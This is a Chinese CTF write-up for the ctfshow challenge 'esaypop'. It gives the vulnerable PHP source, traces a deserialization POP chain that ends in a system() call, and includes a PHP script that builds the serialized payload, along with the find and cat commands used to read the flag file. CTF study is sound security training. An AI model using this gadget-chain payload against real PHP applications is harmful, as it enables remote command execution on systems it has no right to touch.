2. 程式人生 > 其它 >ctfshow-擊劍杯-esaypop(反序列化構造pop鏈)

ctfshow-擊劍杯-esaypop(反序列化構造pop鏈)

阿新 發佈:2021-11-17

題目地址:https://ctf.show/challenges

題目原始碼:

 <?php 
highlight_file (__FILE__);
error_reporting(0);
class action_1{
    public $tmp;
    public $fun = 'system';
    public function __call($wo,$jia){
        call_user_func($this->fun);
    }
    public function __wakeup(){
        $this->fun = '';
        die("阿祖收手吧,外面有套神");
    }
    public function __toString(){
        return $this->tmp->str;
    }
}

class action_2{
    public $p;
    public $tmp;
    public function getFlag(){
        if (isset($_GET['ctfshow'])) {
            $this->tmp = $_GET['ctfshow'];
        }
        system("cat /".$this->tmp);
    }
    public function __call($wo,$jia){
        phpinfo();
    }
    public function __wakeup(){
        echo "<br>";
        echo "php版本7.3哦,沒有人可以再繞過我了";
        echo "<br>";
    }
    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

class action_3{
    public $str;
    public $tmp;
    public $ran;
    public function __construct($rce){
        echo "送給你了";
        system($rce);
    }
    public function __destruct(){
        urlencode($this->str);
    }
    public function __get($jia){
        if(preg_match("/action_2/",get_class($this->ran))){
            return "啥也沒有";
        }
        return $this->ran->$jia();
    }
}

class action_4{
    public $ctf;
    public $show;
    public $jia;
    public function __destruct(){
        $jia = $this->jia;
        echo $this->ran->$jia;
    }
    public function append($ctf,$show){
        echo "<br>";
        echo new $ctf($show);
    }
    public function __invoke(){
        $this->append($this->ctf,$this->show);
    }
}
if(isset($_GET['pop'])){
    $pop = $_GET['pop'];
    $output = unserialize($pop);
    if(preg_match("/php/",$output)){
            echo "套神黑進這裡並給你了一個提示:檔名是f開頭的形如fA6_形式的檔案";
            die("不可以用偽協議哦");
        }
}

審計第一步找到有用的執行函式,找到action3裡面的system,發現system在action3的解構函式中,也就是需要new action()才行,跟進找到action4中的append函式中包含 echo new $ctf($show); 而__invoke()函式呼叫的append,所以我們需要觸發action4中的invoke函式,那就需要找到能將action4當做函式執行的,action2中的__get()方法就可以將控制$p為然後將$p當做函式執行,那麼現在問題變成如何觸發__get()方法,剛好action4裡面有一句echo $this->ran->$jia;

,那麼如果讓$ran賦值為類action2,而action2裡面沒有$jia,導致了觸發__get()方法,所以這裡就是是入口了

pop鏈為:action4中的$this->ran->$jia->action2中的__get()->action4中的__invoke()->append()->action3的system($rce);

然後再看傳參,$rce就是傳過來的$show,,所以$show=需要執行的命令

payload:

$obj4 = new action_4();
$obj2 = new action_2();
$obj4->ran = $obj2;
$obj2->p = $obj4;
$obj4->ran = $obj2;
$obj4->jia = '1';
$obj4->ctf = 'action_3';
$obj4->show = '語句';
echo urlencode(serialize($obj4));

這裡的語句先執行find / -name f[A-z][0-9]_*,因為給的提示並不直接,饒了一下,直接找fA6_*是找不到的,然後發現檔名為fz3_.txt,再執行cat /fz3.txt(此處是我執行反彈shell失敗了,不然的話不用踩這個檔名的坑)

ps:本體官方也有wp,不過思路有些不一樣而已,這要是我想大佬諮詢所得,僅當做個人學習的參考~

It is never too late to learn 個人部落格:yiaho.cn

相關推薦

ctfshow-擊劍-esaypop序列構造pop

題目地址:https://ctf.show/challenges 題目原始碼: <?php highlight_file (__FILE__); error_reporting(0);

白說:php序列pop

前言 最近的CTF比賽中,感覺PHP序列化反序列化漏洞中的POP鏈的身影越越多了,特此,寫一篇關於POP鏈構造的小文,內容不深,更多的是想提供給想要入坑的小夥伴們一點借鑑(厲害的大牛實在太多),所以,本文的自我定

CTFSHOW-日刷-[吃雞]cjbweb/簡單序列

<?php error_reporting(0); $safe=\"Hack me!\"; class Hacker{ public $name=\"var_dump\"; public $msg=\"Happy to cjb\";

Lab: Arbitrary object injection in PHP:PHP中任意物件的注入序列漏洞

靶場內容 本實驗使用基於序列化的會話機制,因此容易受到任意物件注入的影響。為了解決實驗室問題,建立並注入惡意序列化物件以morale.txt從 Carlos 的主目錄中刪除檔案。您需要獲得原始碼訪問許可權才能解決此實驗

JAVA序列之URLDNS分析

前言 從之前shiro、fastjson等序列漏洞剛曝出的時候,就接觸ysoserial的工具利用了,不過這麼久都沒好好去學習過其中的利用,這次先從其中的一個可以說是最簡單的利用URLDNS開始學起。

CVE-2020-15148 Yii框架序列RCE利用 exp

簡介 如果在使用yii框架,並且在使用者可以控制的輸入處呼叫了unserialize()並允許特殊字元的情況下,會受到序列遠端命令命令執行漏洞攻擊。

Yii框架序列RCE利用分析

影響範圍 Yii2 < 2.0.38 測試版本 yii-basic-app-2.0.37.tgz 原理我這邊看了一下,是能夠看懂,但是我是菜雞,序列構造不出來=。=

fastjson序列-JdbcRowSetImpl利用

fastjson序列-JdbcRowSetImpl利用 JdbcRowSetImpl利用 fastjson序列JdbcRowSetImpl - Afant1 - 部落格園 (cnblogs.com)

FastJSON解析Json字串序列化為List、Map

Fastjosn反序列化josn成Java pojo,轉化為list、map的方法實戰! 在日常開發與資料庫打交道的時候,常有以Json格式的字串儲存到資料庫的情況,當在Java程式中獲取到對應的Json格式的String字串後,如何才能轉換為

Shiro序列漏洞利用匯總Shiro-550+Shiro-721

Apache Shiro是一個強大易用的Java安全框架,提供了認證、授權、加密和會話管理等功能。Shiro框架直觀、易用,同時也能提供健壯的安全性。

Apache Shiro 1.2.4序列漏洞CVE-2016-4437

0x01簡介 Apache Shiro是一款開源安全框架,提供身份驗證、授權、密碼學和會話管理。Shiro框架直觀、易用,同時也能提供健壯的安全性。

序列中的物件逃逸——安洵2019 easy_serialize_php

一週沒寫部落格了,這裡簡單梳理一下序列的普遍知識點 序列的物件逃逸問題一般分為兩種~~,我先談一下自己的理解,首先是過濾函式分為兩種情況

Shiro remeberMe序列漏洞復現Shiro-550

Apache Shiro是一個強大易用的Java安全框架,提供了認證、授權、加密和會話管理等功能。Shiro框架直觀、易用,同時也能提供健壯的安全性。在Apache Shiro編號為550的 issue 中爆出嚴重的 Java 反序列化漏洞。

Go語言的序列序列binary

encoding/binary包實現了簡單的數字固定長度的數字型別或者只包含定長值的結構體或陣列與位元組系列的轉換以及變長值的編解碼。

Flutter | Json自動序列——json_serializable附原始碼

https://www.jianshu.com/p/b307a377c5e8 前言 Google推出flutter這樣一個新的高效能跨平臺Android,ios快速開發框架之後,被業界許多開發者所關注。我在接觸了flutter之後發現這個確實是一個好東西,好東西當

shiro序列復現(續 ---利用docker-vulhub搭建復現為了打出shell,針對linux系統

續寫上次那個因為用fofa去搜索發現找出的是windows系統,所以利用nc沒有將shell反彈出來,windows中系統命令反彈還未研究,所以先利用linux系統,更直觀點。

Apache Shiro序列漏洞復現CVE-2016-4437

0x00 Apache Shiro簡介 Apache Shiro是一款開源安全框架,提供身份驗證、授權、密碼學和會話管理。Shiro框架直觀、易用,同時也能提供健壯的安全性。

Yii2序列CVE-2020-15148復現

為了方便安裝,直接在githubhttps://github.com/yiisoft/yii2下載一個release的低版本,然後解壓tgz檔案到phpstudy的www的目錄下,命名為Yii2:

Apache Dubbo序列漏洞CVE-2019-17564復現分析

漏洞描述 Apache Dubbo是一款高效能Java RPC框架,核心功能是方便麵向介面的遠端過程呼叫,叢集容錯和負載均衡,以及服務自動註冊與發現。

【漏洞復現系列】WebLogic XMLDecoder序列漏洞CVE-2017-10271

使用vulhub環境: https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2017-10271 啟動測試環境: